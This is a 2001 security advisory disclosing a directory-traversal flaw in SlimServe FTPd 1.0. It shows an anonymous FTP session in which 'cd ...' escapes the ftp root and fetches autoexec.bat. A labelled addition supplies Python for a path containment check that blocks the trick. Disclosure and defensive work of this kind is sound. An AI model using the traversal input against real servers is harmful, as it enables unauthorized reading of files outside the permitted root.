Date: Wed, 28 Feb 2001 18:35:23 -0500
From: [email protected]
To: [email protected]
Subject: Vulnerability in SlimServe FTPd
Vulnerability in SlimServe FTPd
Overview
SlimServe FTPd v1.0 is an ftp server available from
http://www.whitsoftdev.com and http://www.download.com. A vulnerability
exists which allows an attacker to break out of the ftp root using
relative paths (i.e. '...').
Details
The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.
% ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-SlimServe FTPd 1.0 :: www.whitsoftdev.com.
220 127.0.0.1 connected to xxxxxxxxxx.rh.rit.edu.
User (xxxxxxxxxx.rh.rit.edu:(none)): anonymous
230 User anonymous logged in, proceed.
ftp> cd ...
250 CWD command successful.
ftp> get autoexec.bat
200 PORT command successful.
150 Opening data connection for "/.../autoexec.bat".
250 RETR command successful.
ftp: 383 bytes received in 0.16Seconds 2.39Kbytes/sec.
ftp>
Solution
No quick fix is possible.
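As an added illustration, not part of the original advisory and not SlimServe's code, the following Python shows the server-side containment check whose absence the session above demonstrates. Every path component consisting only of two or more dots is refused, because legacy Windows path handling treated '...' as the grandparent directory (which is how "cd ..." climbs out of c:\directory\directory), and the advisory's session is replayed against the check. The names normalize_ftp_path and replay, and the 250/550 reply strings, are assumptions for this example.

```python
import posixpath
import re

# Added example (not SlimServe code): a containment check for FTP path arguments.
# POSIX treats "..." as an ordinary file name, but legacy Windows path handling
# resolved "..." as the grandparent directory, so any dot-only component of two
# or more dots is refused outright instead of being passed to the filesystem.
DOT_ONLY = re.compile(r"^\.{2,}$")


def normalize_ftp_path(cwd, requested):
    """Canonicalise an FTP CWD/RETR argument against the current virtual
    directory. Returns a '/'-rooted virtual path, or None when the request
    would leave the ftp root (the server should answer 550 in that case)."""
    if not cwd.startswith("/"):
        raise ValueError("cwd must be an absolute virtual path")
    if requested.startswith(("/", "\\")):
        target = requested
    else:
        target = posixpath.join(cwd, requested)
    # Windows servers accept backslashes as separators too; unify before splitting.
    target = target.replace("\\", "/")
    parts = []
    for comp in target.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                return None          # '..' at the root: refuse rather than clamp
            parts.pop()
            continue
        if DOT_ONLY.match(comp):
            return None              # '...', '....': ambiguous on Windows, refuse
        parts.append(comp)
    return "/" + "/".join(parts)


def replay(commands, cwd="/"):
    """Walk (verb, argument) pairs as the advisory's session does and return
    the server's decision for each step plus the cwd after the last one."""
    log = []
    for verb, arg in commands:
        path = normalize_ftp_path(cwd, arg)
        if path is None:
            log.append((verb, arg, "550 refused"))
            continue
        if verb == "CWD":
            cwd = path
        log.append((verb, arg, "250 ok " + path))
    return log, cwd


if __name__ == "__main__":
    # Constructed replay of the advisory's session: "cd ..." then "get autoexec.bat".
    for entry in replay([("CWD", "..."), ("RETR", "autoexec.bat")])[0]:
        print(entry)
```

With this check in place the "cd ..." step is answered with 550 and the client stays in the ftp root, so the following RETR resolves to /autoexec.bat inside the root rather than to "/.../autoexec.bat" as in the session above.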
Vendor Status
WhitSoft Development was contacted via <[email protected]> on
Tuesday, February 20, 2001. No reply was received.
- Joe Testa ( e-mail: [email protected] / AIM: LordSpankatron )